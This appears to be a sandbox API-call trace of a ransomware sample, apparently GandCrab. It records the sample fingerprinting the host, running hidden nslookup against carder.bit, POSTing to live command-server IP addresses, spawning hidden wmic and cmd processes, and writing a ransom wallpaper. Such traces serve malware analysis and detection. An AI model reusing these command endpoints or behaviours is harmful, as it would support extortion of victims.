Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 50 milliseconds (0.050 seconds) True 2
Fn
Window Create class_name = MyMainWnd, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = MyMainWnd, index = 18446744073709551600, new_long = 1421869056 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Thread 0xa54
2 0
»
Category Operation Information Success Count Logfile
Window Create class_name = MyMainWnd, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 50 milliseconds (0.050 seconds) True 1
Fn
Thread 0xa58
90 35
»
Category Operation Information Success Count Logfile
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Fn
Mutex Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=8a13d26b705ba84c True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Fn
System Get Time type = Ticks, time = 100183 True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Control Panel\International True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Inet Read Response size = 10238, size_out = 14 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 256 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, type = size True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 238601, size_out = 238601 True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0xb04, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 309 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 176.223.114.212, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = ayphore, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 176.223.114.212/ayphore True 1
Fn
Data
Inet Read Response size = 204798, size_out = 552 True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 116782 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
System Get Time type = Ticks, time = 145205 True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0xbc4, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read filename = C:\\CRAB-DECRYPT.txt, size = 4096, size_out = 308 True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 93.103.166.70, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = stowsc?orestei=ea, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 93.103.166.70/stowsc?orestei=ea True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x750ddf04 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Process Create process_name = C:\Windows\system32\wbem\wmic.exe, show_window = SW_HIDE True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x750ddf04 True 1
Fn
System Get Time type = Ticks, time = 151367 True 1
Fn
System Get Time type = Ticks, time = 152366 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, size = 14 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, size = 40 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, size = 5184000 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 256 True 1
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
Process Create process_name = https://www.torproject.org/download/download-easy.html.en, show_window = SW_SHOW False 1
Fn
Thread 0xa60
524 0
»
Category Operation Information Success Count Logfile
Driver Enumerate load_addresses = 1638160 True 1
Fn
Driver Enumerate load_addresses = 2162688 True 1
Fn
Driver Get Name load_address = 42323968 True 1
Fn
Driver Get Name load_address = 42024960 True 1
Fn
Driver Get Name load_address = 12156928 True 1
Fn
Driver Get Name load_address = 13324288 True 1
Fn
Driver Get Name load_address = 13647872 True 1
Fn
Driver Get Name load_address = 13729792 True 1
Fn
Driver Get Name load_address = 15540224 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 15351808 True 1
Fn
Driver Get Name load_address = 16326656 True 1
Fn
Driver Get Name load_address = 16683008 True 1
Fn
Driver Get Name load_address = 16719872 True 1
Fn
Driver Get Name load_address = 14114816 True 1
Fn
Driver Get Name load_address = 15413248 True 1
Fn
Driver Get Name load_address = 14323712 True 1
Fn
Driver Get Name load_address = 14409728 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 12959744 True 1
Fn
Driver Get Name load_address = 15466496 True 1
Fn
Driver Get Name load_address = 13066240 True 1
Fn
Driver Get Name load_address = 13238272 True 1
Fn
Driver Get Name load_address = 14495744 True 1
Fn
Driver Get Name load_address = 14561280 True 1
Fn
Driver Get Name load_address = 17539072 True 1
Fn
Driver Get Name load_address = 17850368 True 1
Fn
Driver Get Name load_address = 18939904 True 1
Fn
Driver Get Name load_address = 17932288 True 1
Fn
Driver Get Name load_address = 20656128 True 1
Fn
Driver Get Name load_address = 18317312 True 1
Fn
Driver Get Name load_address = 20766720 True 1
Fn
Driver Get Name load_address = 20836352 True 1
Fn
Driver Get Name load_address = 21327872 True 1
Fn
Driver Get Name load_address = 22323200 True 1
Fn
Driver Get Name load_address = 22716416 True 1
Fn
Driver Get Name load_address = 23310336 True 1
Fn
Driver Get Name load_address = 25423872 True 1
Fn
Driver Get Name load_address = 25726976 True 1
Fn
Driver Get Name load_address = 25792512 True 1
Fn
Driver Get Name load_address = 26103808 True 1
Fn
Driver Get Name load_address = 26136576 True 1
Fn
Driver Get Name load_address = 26374144 True 1
Fn
Driver Get Name load_address = 26447872 True 1
Fn
Driver Get Name load_address = 26484736 True 1
Fn
Driver Get Name load_address = 26722304 True 1
Fn
